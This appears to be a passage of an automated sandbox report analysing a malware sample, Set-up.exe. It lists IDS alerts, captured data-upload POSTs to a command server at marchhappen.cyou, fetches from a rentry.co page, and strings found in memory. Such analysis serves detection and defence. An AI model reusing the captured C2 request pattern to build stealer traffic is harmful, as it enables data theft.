                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 172.67.75.40:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=604ZQ9UOTHVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18123Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WAFYLO6NKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8732Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AWZPLICSBPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20391Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3JYEH0QNJIXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1215Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TEDY2270QJS4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553634Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: kQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: marchhappen.cyou
                    Source: global trafficDNS traffic detected: DNS query: rentry.co
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marchhappen.cyou
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 25 Nov 2024 09:54:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8771Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://b.chenall.net/menu.lst
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://bug.reneelab.com
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://bugreports.qt-project.org/
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
                    Source: Set-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://contoso.com/rdweb/Feed/webfeed.aspx.
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://grub4dos.chenall.net/e/%u)
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://isecure-a.reneelab.com/webapi.php?code=
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://isecure.reneelab.com/webapi.php?code=
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: Set-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://qt.digia.com/
                    Source: Set-up.exe, 00000008.00000002.2161780433.000000006C32E000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://qt.digia.com/product/licensing
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com02
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com05
                    Source: Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://support.reneelab.com/anonymous_requests/new
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entityUnknown
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
